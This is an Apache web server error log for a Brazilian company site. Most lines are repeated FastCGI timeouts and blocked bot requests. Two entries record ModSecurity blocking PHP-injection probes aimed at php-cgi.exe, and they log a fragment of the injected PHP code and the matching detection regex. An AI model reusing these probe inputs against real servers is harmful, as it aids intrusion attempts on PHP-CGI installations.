[Mon Mar 16 01:17:50.128736 2026] [proxy_fcgi:error] [pid 10831:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42740] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:18:11.111345 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42840] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:18:33.085802 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43000] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:18:54.139673 2026] [proxy_fcgi:error] [pid 10709:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43160] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:19:15.133773 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43262] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:19:35.204841 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.228.16:60866] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeE17ABkC4fWIHEf8G6gAAAAEU"]
[Mon Mar 16 01:19:36.125871 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43398] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:19:57.128096 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43510] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:20:18.129835 2026] [proxy_fcgi:error] [pid 10709:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43618] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:20:40.131430 2026] [proxy_fcgi:error] [pid 10772:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43760] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:21:01.030332 2026] [proxy_fcgi:error] [pid 10772:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43968] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:21:22.129775 2026] [proxy_fcgi:error] [pid 10772:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44108] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:21:25.815122 2026] [:error] [pid 11972:tid 140411548894976] [client 209.38.248.17:60938] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml|xpacket)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "6"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/php-cgi/php-cgi.exe"] [unique_id "abeFRZqj1wV0Si-Okee2PwAAABc"]
[Mon Mar 16 01:21:25.816398 2026] [:error] [pid 21805:tid 140411607643904] [client 159.223.132.86:42260] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml|xpacket)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "6"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/php-cgi/php-cgi.exe"] [unique_id "abeFRLABkC4fWIHEf8G6oAAAAFA"]
[Mon Mar 16 01:21:26.151346 2026] [access_compat:error] [pid 11972:tid 140411565680384] [client 159.223.132.86:42264] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 01:21:26.714818 2026] [access_compat:error] [pid 21806:tid 140411741927168] [client 209.38.248.17:60948] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 01:21:43.140412 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44256] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:22:05.125811 2026] [proxy_fcgi:error] [pid 10772:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44394] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:22:26.141799 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44530] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:22:50.077827 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44658] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:23:11.130633 2026] [proxy_fcgi:error] [pid 10772:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44736] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:23:32.149769 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44868] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:23:54.121468 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45068] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:24:15.121944 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45200] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:24:36.142042 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45344] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:24:36.202442 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.244.31:35344] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeGBJqj1wV0Si-Okee2bQAAABc"]
[Mon Mar 16 01:24:50.110356 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.228.16:56600] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeGErysWC90G-1nBrAWhgAAAY0"]
[Mon Mar 16 01:24:57.113723 2026] [proxy_fcgi:error] [pid 10772:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45476] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:25:18.120651 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45620] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:25:39.045845 2026] [proxy_fcgi:error] [pid 10651:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45742] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:26:08.122856 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45992] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:26:32.131288 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46294] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:26:54.126030 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46528] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:27:17.128555 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46822] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:27:38.089823 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46956] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:28:00.131169 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47116] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:28:21.053817 2026] [proxy_fcgi:error] [pid 10709:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47264] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:28:42.126375 2026] [proxy_fcgi:error] [pid 10831:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47484] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:29:03.069964 2026] [proxy_fcgi:error] [pid 10709:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47638] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:29:24.129844 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47766] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:29:40.201085 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.244.31:57682] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeHNLABkC4fWIHEf8G68wAAAEc"]
[Mon Mar 16 01:29:45.129805 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47906] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:29:54.833613 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.228.16:32952] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeHQnjZBu2q05ozVU8iNwAAAVY"]
[Mon Mar 16 01:30:06.109828 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48020] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:30:27.132186 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48134] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:30:48.130920 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48256] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:31:09.135409 2026] [proxy_fcgi:error] [pid 10651:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48408] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:31:30.133836 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48590] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:31:53.133816 2026] [proxy_fcgi:error] [pid 10651:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48812] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:32:16.131014 2026] [proxy_fcgi:error] [pid 10831:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49048] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:32:38.033795 2026] [proxy_fcgi:error] [pid 10651:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49206] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:32:59.129902 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49322] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:33:21.145883 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49470] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:33:42.148826 2026] [proxy_fcgi:error] [pid 10651:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49676] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:34:04.033801 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49822] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:34:26.070064 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49990] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:34:47.125821 2026] [proxy_fcgi:error] [pid 10709:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50132] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:35:02.267513 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.244.31:42370] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeIdrABkC4fWIHEf8G7HgAAAEs"]
[Mon Mar 16 01:35:08.141265 2026] [proxy_fcgi:error] [pid 10709:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50326] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:35:19.082016 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.228.16:57876] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeIhwlT9VtDQc7bgUxo-QAAAQY"]
[Mon Mar 16 01:35:29.120226 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50510] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:35:50.038508 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50668] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:36:11.089831 2026] [proxy_fcgi:error] [pid 10772:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50828] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:36:32.153307 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50938] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:36:53.131597 2026] [proxy_fcgi:error] [pid 10772:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51066] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:37:14.133813 2026] [proxy_fcgi:error] [pid 10772:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51168] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:37:37.149912 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51302] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:37:59.069847 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51454] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:38:21.141186 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51622] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:38:43.099567 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51714] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:39:04.119881 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51860] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:39:25.139321 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51968] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:39:47.122796 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52146] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:40:07.127730 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.244.31:33478] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeJpwlT9VtDQc7bgUxpTAAAAQw"]
[Mon Mar 16 01:40:08.125807 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52278] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:40:21.718705 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.228.16:34384] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeJtZqj1wV0Si-Okee2_wAAABY"]
[Mon Mar 16 01:40:29.033994 2026] [proxy_fcgi:error] [pid 10709:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52444] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:40:50.135989 2026] [proxy_fcgi:error] [pid 10772:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52644] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:41:11.121988 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:41:32.249845 2026] [proxy_fcgi:error] [pid 10831:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52836] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:41:54.131312 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52956] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:42:15.041848 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53142] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:42:38.129918 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53268] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:42:59.057330 2026] [proxy_fcgi:error] [pid 10831:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:43:20.415111 2026] [proxy_fcgi:error] [pid 10772:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53546] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:43:43.125799 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53696] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:44:05.131190 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53938] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:44:26.129875 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54066] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:44:48.133860 2026] [proxy_fcgi:error] [pid 10831:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54184] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:45:10.133778 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54360] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:45:30.883917 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.244.31:45932] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeK6rysWC90G-1nBrAXOQAAAYE"]
[Mon Mar 16 01:45:31.129838 2026] [proxy_fcgi:error] [pid 10772:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54576] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:45:41.630136 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.228.16:54782] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeK9Y6lpbStxTqkSks8dgAAAlQ"]
[Mon Mar 16 01:45:57.123902 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54754] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:46:18.029857 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54962] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:46:40.125890 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55138] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:47:01.129837 2026] [proxy_fcgi:error] [pid 10772:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55296] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:47:22.129874 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55450] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:47:43.136405 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55590] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:48:04.129848 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55734] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:48:25.098818 2026] [proxy_fcgi:error] [pid 10772:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55856] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:48:46.133797 2026] [proxy_fcgi:error] [pid 10831:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55980] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:49:08.125807 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56088] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:49:29.133800 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56210] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:49:50.129773 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56354] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:50:11.673785 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56518] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:50:33.130112 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56614] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:50:54.137849 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56716] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:51:15.125834 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56814] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:51:36.117838 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56878] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:51:43.733812 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.244.31:33214] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeMXxXjF1vJNtV6CWrJjAAAAc4"]
[Mon Mar 16 01:52:01.069852 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57074] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:52:22.137822 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57142] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:52:43.137821 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57244] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:53:04.126939 2026] [proxy_fcgi:error] [pid 10772:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57428] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:53:25.037856 2026] [proxy_fcgi:error] [pid 10709:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57612] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:53:46.119626 2026] [proxy_fcgi:error] [pid 10709:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57754] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:54:07.121790 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57892] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:54:31.129785 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58048] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:54:53.133917 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58138] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:55:14.126507 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58242] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:55:35.069877 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58360] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:55:57.857805 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58538] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:56:19.133779 2026] [proxy_fcgi:error] [pid 10709:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58678] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:56:40.113880 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58834] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:57:01.077803 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58978] AH01075: Error dispatching request to : (polling)
